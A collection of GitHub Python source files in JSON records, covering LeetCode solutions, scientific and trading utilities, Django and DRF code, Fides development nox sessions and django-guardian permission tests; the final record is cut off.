+{"seq_id":"72263256541","text":"# Given an array of integers nums which is sorted in ascending order, and an integer target, \n# write a function to search target in nums. If target exists, then return its index. \n# Otherwise, return -1.\n\n# Example 1:\n\n# Input: nums = [-1,0,3,5,9,12], target = 9\n# Output: 4\n# Explanation: 9 exists in nums and its index is 4\n\nfrom cmath import pi\nimport re\n\n\nclass Solution():\n def search(self, nums, target):\n left, right = 0 , len(nums) - 1\n while left <= right:\n pivot = left + (right - left) / 2 \n if nums[pivot] == target:\n return pivot\n if target < nums[pivot]:\n right = pivot - 1 \n else:\n left = pivot + 1\n return -1\n\n\ns = Solution()\n\nprint(s.search([-1,0,3,5,9,12],9))","repo_name":"AlfredDev/LeetCode75-Py","sub_path":"704-Binary Search.py","file_name":"704-Binary Search.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73053481500","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom soma.spm.custom_decorator_pattern import checkIfArgumentTypeIsAllowed\nimport numbers\n\nclass OptimisationSettings(object):\n \"\"\"\n Settings for the optimisation. If you are unsure about them, then leave them at the default values. Optimisation is by repeating a\n number of Levenberg-Marquardt iterations, in which the equations are solved using a full multi-grid (FMG) scheme. FMG and\n Levenberg-Marquardt are both described in Numerical Recipes (2nd edition).\n \"\"\"\n @checkIfArgumentTypeIsAllowed(numbers.Real, 1)\n def setLMRegularisation(self, LM_regularisation):\n \"\"\"\n Levenberg-Marquardt regularisation. Larger values increase the the stability of\n the optimisation, but slow it down. A value of zero results in a Gauss-Newton\n strategy, but this is not recommended as it may result in instabilities in the FMG.\n \"\"\"\n self.LM_regularisation = LM_regularisation\n \n @checkIfArgumentTypeIsAllowed(int, 1)\n def setCycles(self, cycles):\n \"\"\"\n Number of cycles used by the full multi-grid matrix solver. More cycles result in\n higher accuracy, but slow down the algorithm. See Numerical Recipes for more\n information on multi-grid methods.\n \"\"\"\n if cycles in [1, 2, 3, 4, 5, 6, 7, 8]:\n self.cycles = cycles\n else:\n raise ValueError(\"Unvalid cycles\")\n \n @checkIfArgumentTypeIsAllowed(int, 1)\n def setIterations(self, iterations):\n \"\"\"\n Number of relaxation iterations performed in each multi-grid cycle. More\n iterations are needed if using ``bending energy'' regularisation, because the\n relaxation scheme only runs very slowly. See the chapter on solving partial\n differential equations in Numerical Recipes for more information about relaxation\n methods.\n \"\"\"\n if iterations in [1, 2, 3, 4, 5, 6, 7, 8]:\n self.iterations = iterations\n else:\n raise ValueError(\"Unvalid cycles\")\n \n def getStringListForBatch(self):\n if not None in [self.LM_regularisation, self.cycles, self.iterations]:\n batch_list = []\n batch_list.append(\"optim.lmreg = \" + str(self.LM_regularisation) + \";\")\n batch_list.append(\"optim.cyc = \" + str(self.cycles) + ';')\n batch_list.append(\"optim.its = \" + str(self.iterations) + ';')\n return batch_list \n else:\n raise ValueError('At least one OptimisationSettings parameter missed')\n ","repo_name":"brainvisa/brainvisa-spm","sub_path":"python/soma/spm/virtual_spm/tools/dartel_tools/run_dartel/optimisation_settings.py","file_name":"optimisation_settings.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"71875406299","text":"from tornado.web import RequestHandler\nfrom tornado import gen\nfrom json import dumps, loads\nfrom random import randint\nfrom db import DbHandler\n\nclass TaskHandler(RequestHandler):\n def initialize(self):\n self.db = DbHandler.get_db()\n\n @gen.coroutine\n def post(self):\n user = self.get_secure_cookie(\"user\").decode()\n result = int(loads(self.request.body.decode()).get('result', '0'))\n new_task = self.generate_task()\n balance = yield self.db.update_score(user, result, new_task)\n self.write(dumps({\n \"task\" : new_task,\n \"balance\" : balance\n }))\n\n def generate_task(self):\n return randint(2**17, 2**24)\n","repo_name":"HackerDom/qctf-starter-2018","sub_path":"tasks/browser-mining/tornado/handlers/TaskHandler.py","file_name":"TaskHandler.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"74228805659","text":"import numpy as np\ndef merge_main_context(W, merge_fun=lambda m, c: np.mean([m, c], axis=0),\n normalize=True):\n \"\"\"\n Merge the main-word and context-word vectors for a weight matrix\n using the provided merge function (which accepts a main-word and\n context-word vector and returns a merged version).\n\n By default, `merge_fun` returns the mean of the two vectors.\n \"\"\"\n\n vocab_size = len(W) / 2\n for i, row in enumerate(W[:vocab_size]):\n merged = merge_fun(row, W[i + vocab_size])\n if normalize:\n merged /= np.linalg.norm(merged)\n W[i, :] = merged\n\n return W[:vocab_size]\n\ndef read_lines_in_file(path):\n with open(path) as f:\n return f.read().split(\"\\n\")","repo_name":"danielvarab/contradiction-detection","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"14954058802","text":"import logging\nfrom typing import List\n\n\nclass Solution:\n @classmethod\n def moveZeroes(cls, nums: List[int]):\n logging.debug(f\"input: nums = {nums}\")\n result_nums_idx = -1\n\n for i in range(len(nums)):\n if nums[i] != 0:\n result_nums_idx += 1\n nums[result_nums_idx] = nums[i]\n\n while result_nums_idx > -1 and result_nums_idx + 1 < len(nums):\n result_nums_idx += 1\n if nums[result_nums_idx] != 0:\n nums[result_nums_idx] = 0\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n nums1 = [0, 1, 0, 3, 12]\n expected_nums1 = [1, 3, 12, 0, 0]\n Solution.moveZeroes(nums1)\n for i in range(len(expected_nums1)):\n assert nums1[i] == expected_nums1[i]\n\n nums2 = [0]\n expected_nums2 = [0]\n Solution.moveZeroes(nums2)\n for i in range(len(expected_nums2)):\n assert nums2[i] == expected_nums2[i]\n\n nums3 = [0, 0, 0]\n expected_nums3 = [0, 0, 0]\n Solution.moveZeroes(nums3)\n for i in range(len(expected_nums3)):\n assert nums3[i] == expected_nums3[i]\n","repo_name":"ladamalina/leetcode-2022-python","sub_path":"283. Move Zeroes (easy)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33627982241","text":"import numpy as np\n\n\ndef rotation_matrix(a):\n return np.array([[np.cos(a), -np.sin(a)],\n [np.sin(a), np.cos(a)]])\n\n\ndef margin(angle, size, v1, v2):\n vv = v2 - v1\n vv = vv / np.sqrt((vv**2).sum())\n edgelen = size / np.sin(angle)\n v3 = v1 + edgelen * np.dot(rotation_matrix(angle), vv)\n v4 = v2 - edgelen * np.dot(rotation_matrix(-angle), vv)\n return np.c_[v2, v4, v3, v1].T\n\n\ndef regular_polygon(n, v1, v2):\n ang = 2 * np.pi / n\n mat = rotation_matrix(ang)\n vs = np.c_[v1, v2]\n vv = v2 - v1\n vprev = v2\n for i in range(n - 2):\n v = np.dot(mat, vv) + vprev\n vs = np.c_[vs, v]\n vv = v - vprev\n vprev = v\n return vs.T\n","repo_name":"hamukazu/craft_regpolyhed","sub_path":"craftmath.py","file_name":"craftmath.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"8249327875","text":"# -*- coding: utf-8 -*-\nimport os\nimport shutil\nfrom tempfile import mkdtemp\n\nfrom django.test import TestCase\n\nfrom django_extensions.management.mysql import parse_mysql_cnf\n\n\nclass ParseMysqlCnfTests(TestCase):\n \"\"\"Tests for parse_mysql_cnf.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.tmpdir = mkdtemp()\n\n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls.tmpdir)\n\n def test_should_return_empty_strings_if_read_default_file_option_is_missing(self):\n dbinfo = {}\n\n result = parse_mysql_cnf(dbinfo)\n\n self.assertEqual(result, ('', '', '', '', ''))\n\n def test_should_parse_my_cnf_and_retun_connection_settings(self):\n my_cnf_path = os.path.join(self.tmpdir, 'my.cnf')\n with open(my_cnf_path, 'w') as f:\n f.write(\"\"\"[client]\ndatabase = test_name\nuser = test_user\npassword = test_password\nhost = localhost\nport = 3306\nsocket = /var/lib/mysqld/mysql.sock\n\"\"\")\n\n dbinfo = {\n 'ENGINE': 'django.db.backends.mysql',\n 'OPTIONS': {\n 'read_default_file': my_cnf_path,\n }\n }\n\n result = parse_mysql_cnf(dbinfo)\n\n self.assertEqual(result,\n ('test_user', 'test_password', 'test_name',\n '/var/lib/mysqld/mysql.sock', '3306'))\n\n def test_should_return_empty_strings_if_NoSectionError_exception_occured(self):\n my_cnf_path = os.path.join(self.tmpdir, 'my.cnf')\n with open(my_cnf_path, 'w') as f:\n f.write(\"\")\n\n dbinfo = {\n 'ENGINE': 'django.db.backends.mysql',\n 'OPTIONS': {\n 'read_default_file': my_cnf_path,\n }\n }\n result = parse_mysql_cnf(dbinfo)\n\n self.assertEqual(result, ('', '', '', '', ''))\n","repo_name":"django-extensions/django-extensions","sub_path":"tests/test_parse_mysql_cnf.py","file_name":"test_parse_mysql_cnf.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":6269,"dataset":"github-code","pt":"69"}
+{"seq_id":"18768121081","text":"from rest_framework import serializers\nfrom .models import Profile\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n username = serializers.CharField(source=\"user.username\")\n first_name = serializers.CharField(source=\"user.first_name\")\n last_name = serializers.CharField(source=\"user.last_name\")\n email = serializers.EmailField(source=\"user.email\")\n full_name = serializers.SerializerMethodField(read_only=True)\n \"\"\"Allow for null field\"\"\"\n resolution = serializers.CharField(source='custom_resolution.resolution', required=False)\n\n class Meta:\n model = Profile\n fields = [\n 'username',\n 'first_name',\n 'last_name',\n 'full_name',\n 'email',\n 'id',\n 'tier',\n 'resolution',\n 'custom_resolution'\n ]\n\n \"\"\"Allow for null field\"\"\"\n extra_kwargs = {\"resolution\": {\"required\": False, \"allow_null\": True}}\n\n def get_full_name(self, obj):\n first_name = obj.user.first_name.title()\n last_name = obj.user.last_name.title()\n return f\"{first_name} {last_name}\"\n\n\n\n","repo_name":"Packerson/Upload_Images_Api","sub_path":"Upload_Images/apps/profiles/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4289120638","text":"import pandas as pd\nimport numpy\nimport talib\nimport datetime\nfrom datetime import timedelta\nfrom itertools import tee, islice, chain\n\ndef Dataframe(serie):\n return pd.DataFrame(serie ,columns=[\"RSI\"])\n\ndef Dataframe(data,index):\n return pd.DataFrame(data=data,index=index,columns=[\"RSI\"])\n\ndef RSI(close,timeperiod):\n return talib.RSI(close,timeperiod)\n\ndef RSIDataframe(close,timeperiod):\n return pd.DataFrame(talib.RSI(close,timeperiod),columns=[\"RSI\"])\n\ndef CustomRSIdf(dfclose,timeperiod):\n custom = dfclose['Close'].replace(dfclose['Close'].tolist(),talib.RSI(dfclose['Close'],timeperiod))\n custom = custom.rename('RSI')\n return custom.to_frame()\n\ndef intindexposition(df,timestamp):\n return df.index.get_loc(timestamp)\n\n# Analizar rangos de 40 valores ver cuales tienen “RSI (base 7) >70%”\ndef RSImorethan(dfrsi,value):\n if dfrsi.columns[0] == 'RSI(C,7)':\n dfrsi = dfrsi.rename(columns={'RSI(C,7)':'RSI'})\n rsimore70 = dfrsi.query(\"{} >= {}\".format(dfrsi.columns[0],value))\n #print(\"Mas de 70\" + str(rsimore70))\n if len(rsimore70.index) > 0:\n return rsimore70\n else:\n return False\n\ndef changersicolumnname(dfrsi):\n if dfrsi.columns[0] == 'RSI(C,7)':\n return dfrsi.rename(columns={'RSI(C,7)':'RSI'})\n\ndef TopRSI70(dfrsi70):\n top70 = []\n index = []\n cnt = 0\n for previous, item, nxt in previous_and_next(dfrsi70.values.tolist()):\n #print(\"Prev:{}, Nxt:{}, item:{},type:{}\".format(str(previous),str(nxt),str(item),str(type(item))))\n if previous is None:\n if item >= nxt:\n top70.append(item)\n index.append(dfrsi70.index[cnt])\n else:\n if nxt is None:\n if item >= previous:\n top70.append(item)\n index.append(dfrsi70.index[cnt])\n else:\n if item >= nxt and item >= previous:\n top70.append(item)\n index.append(dfrsi70.index[cnt])\n cnt = cnt + 1\n return pd.DataFrame(top70,columns=['RSI'],index=index)\n\ndef previous_and_next(some_iterable):\n prevs, items, nexts = tee(some_iterable, 3)\n prevs = chain([None], prevs)\n nexts = chain(islice(nexts, 1, None), [None])\n return zip(prevs, items, nexts)\n\ndef top2rsivalues(dfrsi):\n dfm70 = RSImorethan70(dfrsi)\n return dfm70.nlargest(2,'RSI')\n\ndef top2rsi70values(dfrsi70):\n return dfrsi70.nlargest(2,'RSI')\n \ndef highestvalue(dfrsi):\n return dfrsi.nlargest(1,'RSI') \n\ndef smallestvalue(dfrsi):\n return dfrsi.nsmallest(1,'RSI')\n\ndef definehighestrsi(top2):\n if top2.values[0] > top2.values[1]:\n return top2.index[0] \n else:\n return top2.index[1]\n\ndef diftime(time1,time2):\n difference = time1-time2\n seconds_in_day = 24 * 60 * 60\n difmin = divmod(difference.days * seconds_in_day + difference.seconds, 60)\n return difmin\n\ndef addminutes(date,min):\n return date + timedelta(minutes=min) \n\ndef datetimetostr(datetime):\n return datetime.strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef changetendency(ant,up):\n if ant < up:\n return True\n else:\n return False\n\ndef istopvalue(threesizearray):\n if max(threesizearray[0]) == val:\n return True\n if min(threesizearray[0] == val):\n return True \n return False\n \n\ndef foundposibleC4(dfrsi,C2,C3):\n if dfrsi.columns[0] == 'RSI(C,7)':\n dfrsi = dfrsi.rename(columns={'RSI(C,7)':'RSI'})\n posibleC4 = dfrsi.query(\"{} >= ({} - 0.5*{})/1.5 and {} <= ({} - 0.786*{})/1.5\").format(dfrsi.columns[0],C2,C3,dfrsi.columns[0],C2,C3)\n #print(\"Mas de 70\" + str(rsimore70))\n if len(posibleC4.index) > 0:\n return posibleC4\n else:\n return False\n\n\n\nif __name__ == '__main__':\n from csvreader import BacktestingDataframe \n AUDUSD = BacktestingDataframe(\"AUDUSD\",\"12-06-2020\").get_dataframe()\n output = talib.CDLEVENINGSTAR(AUDUSD[\"Open\"],AUDUSD[\"High\"],AUDUSD[\"Low\"],AUDUSD[\"Close\"],penetration = 0)\n pd.set_option(\"display.max_rows\",None,\"display.max_columns\",None)\n rsi = RSIDataframe(AUDUSD[\"Close\"],7)\n top2 = top2rsivalues(rsi)\n #print(rsi)\n print(top2)\n print(AUDUSD.index[1])\n print(AUDUSD.index[5])\n print(diftime(top2.index[0],top2.index[1])[0])\n if diftime(top2.index[0],top2.index[1])[0] > 10:\n print(\"Es mayor a diez\")\n #print(top2.index)","repo_name":"JaimeOli/trading-para-todos","sub_path":"source/core/startegiesfunctions.py","file_name":"startegiesfunctions.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36858392546","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 29 21:18:30 2021\r\n\r\n@author: Deepak Murugesan\r\n\"\"\"\r\n\r\nfrom functools import reduce\r\n\r\nfib = lambda n: reduce(lambda x, _: x+[x[-1]+x[-2]],\r\n\t\t\t\t\t\t\t\trange(n-2), [0, 1])\r\n\r\nprint(fib(5))\r\n","repo_name":"DeepakM2001/python_intern","sub_path":"d16/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32033608606","text":"\"\"\"Contains the nox sessions for running development environments.\"\"\"\nfrom typing import Literal\n\nfrom nox import Session, param, parametrize\nfrom nox import session as nox_session\nfrom nox.command import CommandFailed\n\nfrom constants_nox import (\n COMPOSE_SERVICE_NAME,\n EXEC,\n EXEC_IT,\n LOGIN,\n RUN_CYPRESS_TESTS,\n START_APP,\n START_APP_REMOTE_DEBUG,\n START_TEST_ENV,\n)\nfrom docker_nox import build\nfrom run_infrastructure import ALL_DATASTORES, run_infrastructure\nfrom utils_nox import COMPOSE_DOWN_VOLUMES\n\n\n@nox_session()\ndef shell(session: Session) -> None:\n \"\"\"\n Open a shell in an already-running Fides webserver container.\n\n If the container is not running, the command will fail.\n \"\"\"\n shell_command = (*EXEC_IT, \"/bin/bash\")\n try:\n session.run(*shell_command, external=True)\n except CommandFailed:\n session.error(\n \"Could not connect to the webserver container. Please confirm it is running and try again.\"\n )\n\n\n@nox_session()\ndef dev(session: Session) -> None:\n \"\"\"\n Spin up the Fides webserver in development mode alongside it's Postgres\n database and Redis cache. Use positional arguments to run other services\n like privacy center, shell, admin UI, etc. (see usage for examples)\n\n Usage:\n 'nox -s dev' - runs the Fides weserver, database, and cache\n 'nox -s dev -- shell' - also open a shell on the Fides webserver\n 'nox -s dev -- ui' - also build and run the Admin UI\n 'nox -s dev -- pc' - also build and run the Privacy Center\n 'nox -s dev -- remote_debug' - run with remote debugging enabled (see docker-compose.remote-debug.yml)\n 'nox -s dev -- worker' - also run a Fides worker\n 'nox -s dev -- child' - also run a Fides child node\n 'nox -s dev -- ' - also run a test datastore (e.g. 'mssql', 'mongodb')\n\n Note that you can combine any of the above arguments together, for example:\n 'nox -s dev -- shell ui pc'\n\n See noxfiles/dev_nox.py for more info\n \"\"\"\n\n build(session, \"dev\")\n session.notify(\"teardown\")\n\n if \"worker\" in session.posargs:\n session.run(\"docker\", \"compose\", \"up\", \"--wait\", \"worker\", external=True)\n\n datastores = [\n datastore for datastore in session.posargs if datastore in ALL_DATASTORES\n ] or None\n\n if \"child\" in session.posargs:\n session.run(\n \"docker\",\n \"compose\",\n \"-f\",\n \"docker-compose.child-env.yml\",\n \"up\",\n \"-d\",\n external=True,\n )\n\n if \"ui\" in session.posargs:\n build(session, \"admin_ui\")\n session.run(\"docker\", \"compose\", \"up\", \"-d\", \"fides-ui\", external=True)\n\n if \"pc\" in session.posargs:\n build(session, \"privacy_center\")\n session.run(\"docker\", \"compose\", \"up\", \"-d\", \"fides-pc\", external=True)\n\n open_shell = \"shell\" in session.posargs\n remote_debug = \"remote_debug\" in session.posargs\n if not datastores:\n if open_shell:\n session.run(*START_APP, external=True)\n session.log(\"~~Remember to login with `fides user login`!~~\")\n session.run(*EXEC_IT, \"/bin/bash\", external=True)\n else:\n if remote_debug:\n session.run(*START_APP_REMOTE_DEBUG, external=True)\n else:\n session.run(\n \"docker\", \"compose\", \"up\", COMPOSE_SERVICE_NAME, external=True\n )\n else:\n # Run the webserver with additional datastores\n run_infrastructure(\n open_shell=open_shell,\n run_application=True,\n datastores=datastores,\n remote_debug=remote_debug,\n )\n\n\n@nox_session()\ndef cypress_tests(session: Session) -> None:\n \"\"\"\n End-to-end Cypress tests designed to be run as part of the 'e2e_test' session.\n \"\"\"\n session.log(\"Running Cypress tests...\")\n session.run(*RUN_CYPRESS_TESTS, external=True)\n\n\n@nox_session()\ndef e2e_test(session: Session) -> None:\n \"\"\"\n Spins up the test_env session and runs Cypress E2E tests against it.\n \"\"\"\n session.log(\"Running end-to-end tests...\")\n session.notify(\"fides_env(test)\", posargs=[\"test\"])\n session.notify(\"cypress_tests\")\n session.notify(\"teardown\")\n\n\n@nox_session()\n@parametrize(\n \"fides_image\",\n [\n param(\"dev\", id=\"dev\"),\n param(\"test\", id=\"test\"),\n ],\n)\ndef fides_env(session: Session, fides_image: Literal[\"test\", \"dev\"] = \"test\") -> None:\n \"\"\"\n Spins up a full fides environment seeded with data.\n\n Params:\n dev = Spins up a full fides application with a dev-style docker container. This includes hot-reloading and no pre-baked UI.\n test = Spins up a full fides application with a production-style docker container. This includes the UI being pre-built as static files.\n\n Posargs:\n test = instead of running 'bin/bash', runs 'fides' to verify the CLI and provide a zero exit code\n keep_alive = does not automatically call teardown after the session\n \"\"\"\n\n is_test = \"test\" in session.posargs\n keep_alive = \"keep_alive\" in session.posargs\n\n exec_command = EXEC if any([is_test, keep_alive]) else EXEC_IT\n shell_command = \"fides\" if any([is_test, keep_alive]) else \"/bin/bash\"\n\n # Temporarily override some ENV vars as needed. To set local secrets, see 'example.env'\n test_env_vars = {\n \"FIDES__CONFIG_PATH\": \"/fides/src/fides/data/test_env/fides.test_env.toml\",\n }\n\n session.log(\n \"Tearing down existing containers & volumes to prepare test environment...\"\n )\n try:\n session.run(*COMPOSE_DOWN_VOLUMES, external=True, env=test_env_vars)\n except CommandFailed:\n session.error(\n \"Failed to cleanly teardown existing containers & volumes. Please exit out of all other and try again\"\n )\n if not keep_alive:\n session.notify(\"teardown\", posargs=[\"volumes\"])\n\n session.log(\"Building images...\")\n build(session, fides_image)\n build(session, \"admin_ui\")\n build(session, \"privacy_center\")\n\n session.log(\n \"Starting the application with example databases defined in docker-compose.integration-tests.yml...\"\n )\n session.run(\n *START_TEST_ENV, \"fides-ui\", \"fides-pc\", external=True, env=test_env_vars\n )\n session.log(\"Logging in...\")\n session.run(*LOGIN, external=True)\n\n session.log(\n \"Running example setup scripts for DSR Automation tests... (scripts/load_examples.py)\"\n )\n session.run(\n *EXEC,\n \"python\",\n \"/fides/scripts/load_examples.py\",\n external=True,\n env=test_env_vars,\n )\n\n session.log(\n \"Pushing example resources for Data Mapping tests... (demo_resources/*)\"\n )\n session.run(\n *EXEC,\n \"fides\",\n \"push\",\n \"demo_resources/\",\n external=True,\n env=test_env_vars,\n )\n\n # Make spaces in the info message line up\n title = (\n \"FIDES TEST ENVIRONMENT\" if fides_image == \"test\" else \"FIDES DEV ENVIRONMENT \"\n )\n\n session.log(\"****************************************\")\n session.log(\"* *\")\n session.log(f\"* {title} *\")\n session.log(\"* *\")\n session.log(\"****************************************\")\n session.log(\"\")\n # Print out some helpful tips for using the test_env!\n # NOTE: These constants are defined in scripts/setup/constants.py, docker-compose.yml, and docker-compose.integration-tests.yml\n session.log(\n \"Using secrets set in '.env' for example setup scripts (see 'example.env' for options)\"\n )\n if fides_image == \"test\":\n session.log(\n \"Fides Admin UI (production build) running at http://localhost:8080 (user: 'root_user', pass: 'Testpassword1!')\"\n )\n session.log(\n \"Run 'fides user login' to authenticate the CLI (user: 'root_user', pass: 'Testpassword1!')\"\n )\n session.log(\n \"Fides Admin UI (dev) running at http://localhost:3000 (user: 'root_user', pass: 'Testpassword1!')\"\n )\n session.log(\n \"Fides Privacy Center (production build) running at http://localhost:3001 (user: 'jane@example.com')\"\n )\n session.log(\n \"Example Postgres Database running at localhost:6432 (user: 'postgres', pass: 'postgres', db: 'postgres_example')\"\n )\n session.log(\n \"Example Mongo Database running at localhost:27017 (user: 'mongo_test', pass: 'mongo_pass', db: 'mongo_test')\"\n )\n session.log(\"Opening Fides CLI shell... (press CTRL+D to exit)\")\n if not keep_alive:\n session.run(*exec_command, shell_command, external=True, env=test_env_vars)\n\n\n@nox_session()\ndef quickstart(session: Session) -> None:\n \"\"\"Run the quickstart tutorial.\"\"\"\n build(session, \"dev\")\n build(session, \"privacy_center\")\n build(session, \"admin_ui\")\n session.notify(\"teardown\")\n run_infrastructure(datastores=[\"mongodb\", \"postgres\"], run_quickstart=True)\n","repo_name":"AbdoALPOP/fides","sub_path":"noxfiles/dev_nox.py","file_name":"dev_nox.py","file_ext":"py","file_size_in_byte":9015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"72258989981","text":"__author__ = 'Toni'\n\nimport numpy as np\nimport numpy.random as rnd\nfrom PyQt4.QtCore import QString, QTimer, Qt\nfrom PyQt4.QtGui import *\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar\nfrom matplotlibwidget import MatplotlibWidget\nfrom cromatogram_w import Ui_CromWindow\nfrom trasmission import color2str, generate_colors\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QApplication.UnicodeUTF8\n\n\n def _translate(context, text, disambig):\n return QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QApplication.translate(context, text, disambig)\n\n\nclass Cromatogram(QMainWindow):\n def __init__(self, parent, tmodel):\n QMainWindow.__init__(self, parent)\n self.ui = Ui_CromWindow()\n self.ui.setupUi(self)\n self.tmodel = tmodel\n\n # Creates the matplotlib window and the toolbar\n self.mpl_window = MatplotlibWidget()\n self.ui.vl_plot.addWidget(self.mpl_window)\n self.toolbar = NavigationToolbar(self.mpl_window, self)\n self.ui.vl_plot.addWidget(self.toolbar)\n self.color_list = generate_colors(self.tmodel.num_analites)\n # Plot the models\n conc = self.simulate()\n self.plot(conc)\n\n def simulate(self):\n \"\"\" This function simulate the exit of each analito through the column. \"\"\"\n full_concentration = 0.998\n\n tmodel = self.tmodel\n\n if not tmodel.is_ideal_type:\n full_concentration = 0.5\n\n last_plate_conc = np.zeros(tmodel.num_analites)\n\n concentration = []\n for i in np.arange(tmodel.num_analites):\n concentration.append([])\n\n k = 0\n while True:\n tmodel.max_iter += 1\n tmodel.update(1)\n\n for i in np.arange(tmodel.num_analites):\n # amount of concentration in last plate\n aux = tmodel.current_state[4][i][tmodel.num_teo_plates - 1]\n last_plate_conc[i] += aux\n concentration[i].append(aux)\n\n flag = True\n for i in np.arange(tmodel.num_analites):\n if last_plate_conc[i] < full_concentration * tmodel.conc_initial[i]:\n flag = False\n\n if flag:\n # print last_plate_conc\n # print tmodel.conc_initial\n break\n\n k += 1\n\n return k + 1, concentration\n\n def plot(self, concentrations):\n\n for i in np.arange(self.tmodel.num_analites):\n self.mpl_window.axes.set_xlabel(\"Numero de Iteraciones\")\n self.mpl_window.axes.set_ylabel(\"Concentracion\")\n # print concentrations[0], len(concentrations[i + 1])\n self.mpl_window.axes.plot(np.arange(concentrations[0]), concentrations[1][i], color2str(self.color_list[i]),\n label=str(chr(65 + i)))\n self.mpl_window.axes.hold(True)\n\n self.mpl_window.axes.grid()\n self.mpl_window.axes.legend()\n self.mpl_window.draw()\n","repo_name":"tonypg39/spatcc","sub_path":"cromatogram.py","file_name":"cromatogram.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18818510039","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User, Group, Permission\n\nfrom guardian.shortcuts import get_perms_for_model\nfrom guardian.core import ObjectPermissionChecker\nfrom guardian.shortcuts import assign, remove_perm, get_perms, get_users_with_perm\nfrom guardian.exceptions import NotUserNorGroup\n\nfrom guardian.tests.models import Keycard\nfrom guardian.tests.core_test import ObjectPermissionTestCase\n\nclass ShortcutsTests(TestCase):\n fixtures = ['tests.json']\n\n def setUp(self):\n self.user = User.objects.get(username='jack')\n self.group = Group.objects.get(name='admins')\n\n def test_get_perms_for_model(self):\n self.assertEqual(get_perms_for_model(self.user).count(), 3)\n self.assertTrue(list(get_perms_for_model(self.user)) ==\n list(get_perms_for_model(User)))\n self.assertEqual(get_perms_for_model(Permission).count(), 3)\n\n model_str = 'guardian.Keycard'\n self.assertEqual(\n sorted(get_perms_for_model(model_str).values_list()),\n sorted(get_perms_for_model(Keycard).values_list()))\n key = Keycard()\n self.assertEqual(\n sorted(get_perms_for_model(model_str).values_list()),\n sorted(get_perms_for_model(key).values_list()))\n\nclass AssignTest(ObjectPermissionTestCase):\n \"\"\"\n Tests permission assigning for user/group and object.\n \"\"\"\n def test_not_model(self):\n self.assertRaises(NotUserNorGroup, assign,\n perm=\"change_object\",\n user_or_group=\"Not a Model\",\n obj=self.keycard)\n\n def test_user_assign(self):\n assign(\"change_keycard\", self.user, self.keycard)\n assign(\"change_keycard\", self.group, self.keycard)\n self.assertTrue(self.user.has_perm(\"change_keycard\", self.keycard))\n\n def test_group_assing(self):\n assign(\"change_keycard\", self.group, self.keycard)\n assign(\"delete_keycard\", self.group, self.keycard)\n\n check = ObjectPermissionChecker(self.group)\n self.assertTrue(check.has_perm(\"change_keycard\", self.keycard))\n self.assertTrue(check.has_perm(\"delete_keycard\", self.keycard))\n\nclass RemovePermTest(ObjectPermissionTestCase):\n \"\"\"\n Tests object permissions removal.\n \"\"\"\n def test_not_model(self):\n self.assertRaises(NotUserNorGroup, remove_perm,\n perm=\"change_object\",\n user_or_group=\"Not a Model\",\n obj=self.keycard)\n\n def test_user_remove_perm(self):\n # assign perm first\n assign(\"change_keycard\", self.user, self.keycard)\n remove_perm(\"change_keycard\", self.user, self.keycard)\n self.assertFalse(self.user.has_perm(\"change_keycard\", self.keycard))\n\n def test_group_remove_perm(self):\n # assign perm first\n assign(\"change_keycard\", self.group, self.keycard)\n remove_perm(\"change_keycard\", self.group, self.keycard)\n\n check = ObjectPermissionChecker(self.group)\n self.assertFalse(check.has_perm(\"change_keycard\", self.keycard))\n\nclass GetPermsTest(ObjectPermissionTestCase):\n \"\"\"\n Tests get_perms function (already done at core tests but left here as a\n placeholder).\n \"\"\"\n def test_not_model(self):\n self.assertRaises(NotUserNorGroup, get_perms,\n user_or_group=None,\n obj=self.keycard)\n\n def test_user(self):\n perms_to_assign = (\"change_keycard\",)\n\n for perm in perms_to_assign:\n assign(\"change_keycard\", self.user, self.keycard)\n\n perms = get_perms(self.user, self.keycard)\n for perm in perms_to_assign:\n self.assertTrue(perm in perms)\n\n\nclass GetUsersWithPerm(ObjectPermissionTestCase):\n def test_get_users_with_perm(self):\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users, [])\n\n 